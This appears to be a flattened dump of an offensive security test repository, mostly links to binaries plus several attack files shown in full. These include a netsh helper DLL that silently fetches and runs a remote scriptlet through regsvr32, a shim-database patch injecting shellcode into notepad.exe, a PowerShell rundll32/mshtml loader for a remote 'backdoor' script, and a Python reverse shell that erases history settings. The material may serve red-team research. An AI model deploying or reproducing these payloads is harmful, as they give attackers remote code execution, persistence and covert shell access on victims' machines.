https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/msg.dll -------------------------------------------------------------------------------- /msg_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/msg_x64.dll -------------------------------------------------------------------------------- /netshtest.cpp: -------------------------------------------------------------------------------- 1 | // netshtest.cpp : Defines the entry point for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include "netshtest.h" 6 | 7 | BOOL APIENTRY DllMain( HANDLE hModule, 8 | DWORD ul_reason_for_call, 9 | LPVOID lpReserved 10 | ) 11 | { 12 | switch (ul_reason_for_call) 13 | { 14 | case DLL_PROCESS_ATTACH: 15 | case DLL_THREAD_ATTACH: 16 | case DLL_THREAD_DETACH: 17 | case DLL_PROCESS_DETACH: 18 | break; 19 | } 20 | return TRUE; 21 | } 22 | 23 | DWORD WINAPI InitHelperDll(DWORD dwNetshVersion,PVOID pReserved) 24 | { 25 | char *command="cmd.exe /c start regsvr32.exe /s /n /u /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"; 26 | WinExec(command,SW_HIDE); 27 | // MessageBox(0, "netsh hijack", "test", MB_OK); 28 | return 0; 29 | } 30 | 31 | -------------------------------------------------------------------------------- /oabextract: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/oabextract -------------------------------------------------------------------------------- /putty.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/putty.exe -------------------------------------------------------------------------------- /rar.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/rar.exe -------------------------------------------------------------------------------- /rpcloader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/rpcloader.exe -------------------------------------------------------------------------------- /test: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /test.conf: -------------------------------------------------------------------------------- 1 | !sdbpatch 2 | APP=notepad.exe 3 | DBNAME=notepad calc 4 | # 5 | # Win7x86 6 | # AddressOfEntryPoint:00003689 7 | # Checksum:00039741 8 | # 9 | P:notepad.exe,0x39741 10 | R:notepad.exe,0x3689,fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500 11 | !endsdbpatch 12 | -------------------------------------------------------------------------------- /test.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/test.msi -------------------------------------------------------------------------------- /test.ps1: -------------------------------------------------------------------------------- 1 | $a="rundll32.exe javascript:`"\..\mshtml,RunHTMLApplication `";document.write();GetObject(`"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test`")" 2 | $msexe="cmd.exe" 3 | $arguments="/c $a" 4 | start-process $msexe $arguments -NoNewWindow 5 | -------------------------------------------------------------------------------- /test1.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | 13 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /test2.cab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/test2.cab -------------------------------------------------------------------------------- /test3.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/test3.msi -------------------------------------------------------------------------------- /testmsi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/testmsi.png -------------------------------------------------------------------------------- /testprocexp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/testprocexp.exe -------------------------------------------------------------------------------- /vbs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /version.txt: -------------------------------------------------------------------------------- 1 | 2 | $host 3 | 4 | -------------------------------------------------------------------------------- /version1.txt: -------------------------------------------------------------------------------- 1 | 2 | $host 3 | 4 | -------------------------------------------------------------------------------- /x.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | #!/usr/bin/env python 3 | """ 4 | back connect py version,only linux have pty module 5 | code by google security team 6 | """ 7 | import sys,os,socket,pty 8 | shell = "/bin/sh" 9 | def usage(name): 10 | print 'python reverse connector' 11 | print 'usage: %s ' % name 12 | 13 | def main(): 14 | if len(sys.argv) !=3: 15 | usage(sys.argv[0]) 16 | sys.exit() 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | try: 19 | s.connect((sys.argv[1],int(sys.argv[2]))) 20 | print 'connect ok' 21 | except: 22 | print 'connect faild' 23 | sys.exit() 24 | os.dup2(s.fileno(),0) 25 | os.dup2(s.fileno(),1) 26 | os.dup2(s.fileno(),2) 27 | global shell 28 | os.unsetenv("HISTFILE") 29 | os.unsetenv("HISTFILESIZE") 30 | os.unsetenv("HISTSIZE") 31 | os.unsetenv("HISTORY") 32 | os.unsetenv("HISTSAVE") 33 | os.unsetenv("HISTZONE") 34 | os.unsetenv("HISTLOG") 35 | os.unsetenv("HISTCMD") 36 | os.putenv("HISTFILE",'/dev/null') 37 | os.putenv("HISTSIZE",'0') 38 | os.putenv("HISTFILESIZE",'0') 39 | pty.spawn(shell) 40 | s.close() 41 | 42 | if __name__ == '__main__': 43 | main() 44 | --------------------------------------------------------------------------------